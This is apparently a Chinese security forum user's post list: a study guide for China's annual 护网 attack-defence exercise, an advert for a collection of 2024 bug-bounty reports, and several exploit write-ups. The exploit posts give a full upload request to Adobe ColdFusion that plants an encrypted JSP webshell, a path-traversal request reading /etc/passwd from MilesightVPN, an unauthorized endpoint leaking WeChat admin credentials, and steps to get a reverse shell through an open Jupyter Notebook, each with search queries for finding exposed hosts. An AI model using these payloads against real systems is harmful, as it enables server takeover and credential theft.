342242.png.fbed18d3a701679372fe40642c9738ff.png)
ISHACK 发布的所有帖子
-
-
护网行动是指通过技术手段和策略保护网络系统、数据及基础设施免受攻击、入侵或破坏的综合性安全防护工作。在中国,"护网行动"特指公安部组织的年度网络安全攻防演练,旨在检验企业、机构的关键信息基础设施安全能力,通过模拟真实攻击提升防御水平。 --- ### 护网涉及的核心技术领域 学习护网技术需涵盖以下关键方向: #### 1. 网络基础与协议分析 - 重点:TCP/IP、HTTP/HTTPS、DNS等协议原理,网络拓扑与数据包分析。 - 工具:Wireshark、tcpdump、Burp Suite。 - 学习目标:理解网络通信机制,识别异常流量。 #### 2. 渗透测试与漏洞利用 - 内容:Web漏洞(SQL注入、XSS、CSRF)、系统漏洞(缓冲区溢出、提权)、漏洞扫描与利用。 - 工具:Metasploit、Nmap、Sqlmap、OWASP ZAP。 - 认证:CEH(道德黑客认证)、OSCP(渗透测试认证)。 #### 3. 防御技术 - 防火墙与WAF:配置策略,识别恶意流量(如Cloudflare WAF、ModSecurity)。 - 入侵检测/防御系统(IDS/IPS):Snort、Suricata规则编写。 - 终端防护:EDR(端点检测与响应)、病毒查杀技术。 #### 4. 日志分析与威胁狩猎 - 技术:SIEM(安全信息与事件管理)系统使用,如Splunk、ELK Stack。 - 实战:通过日志分析攻击痕迹,追踪APT(高级持续性威胁)。 #### 5. 应急响应与溯源 - 流程:漏洞修复、攻击阻断、取证分析、溯源攻击路径。 - 工具:Volatility(内存取证)、Autopsy(磁盘取证)。 #### 6. 安全意识与合规 - 法规:等保2.0、GDPR、网络安全法。 - 演练:参与CTF比赛、模拟护网红蓝对抗。 --- ### 学习路径建议 1. 基础阶段 - 学习网络原理、Linux/Windows系统管理、Python/Shell脚本。 - 入门书籍:《网络安全入门实践》《Metasploit渗透测试指南》。 2. 实战提升 - 在靶场(如DVWA、Hack The Box)练习渗透与防御。 - 参与漏洞赏金计划(Bug Bounty)积累经验。 3. 专项深入 - 选择细分领域(如Web安全、逆向工程)深入研究。 - 学习二进制安全(IDA Pro、Ghidra)或密码学应用。 4. 认证与社区 - 考取CISP-PTE、CISSP等认证。 - 关注安全社区(FreeBuf、奇安信攻防社区),参与行业会议。 --- ### 资源推荐 - 在线平台:Cybrary、极客时间、攻防世界(CTF训练)。 - 靶场环境:Metasploitable、OWASP WebGoat。 - 开源工具:Nessus(漏洞扫描)、Cuckoo Sandbox(恶意软件分析)。 护网技术需持续跟进最新攻防手段,建议通过实战演练(如参与护网行动、企业SRC)深化技能,同时关注云安全、AI安全等新兴领域。 -
-
新手小白看过来!还有挖洞没思路的白盒子们!这里有一份超棒的2024年SRC漏洞报告,包含2024hvv最新SRC。 这份漏洞报告,足足有800多份呢!这可不是网上随便能找到的资料。看完肯定能学到不少东西。不过要注意,不能保证百分百复现,但可以尝试一下。 报告内容超丰富: - 有2024年部分厂商漏洞的poc(大部分已修复,仅供学习用)。 - 挖掘edu漏洞的思路以及常见漏洞挖掘方法。 - 漏洞涵盖实战、edu、hvv还有赏金漏洞,包括今年hvv最新的SRC。 -
漏洞描述Adobe ColdFusion存在任意文件上传漏洞,通过漏洞攻击者可上传任意文件控制服务器。 漏洞影响Adobe ColdFusion 网络测绘app=”Adobe-ColdFusion” 漏洞复现产品官网 发送数据包上传任意文件 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="path" path --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0-- 再访问路径 /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp
-
漏洞描述Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。 漏洞影响Jupyter Notebook 网络测绘app=”Jupyter-Notebook” && body=”Terminal” 漏洞复现访问目标, 点击 Terminal 打开命令行界面 执行命令并反弹shell
-
漏洞描述MilesightVPN 是一款软件,可使 Milesight 产品的 VPN 通道设置过程更加简便,并可通过网络服务器界面监控连接状态。其中存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。 漏洞影响Milesight VPN 网络测绘“MilesightVPN” 漏洞复现登陆页面 验证POC GET /../etc/passwd HTTP/1.1Host: Accept: / Content-Type: application/x-www-form-urlencoded
-
漏洞描述金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞,攻击者通过漏洞可以获取账号密码信息,获取后台管理员权限。 漏洞影响金盘 微信管理平台 网络测绘title=”微信管理后台” && icon_hash=”116323821″ 漏洞复现登陆页面 验证POC /admin/weichatcfg/getsysteminfo
-
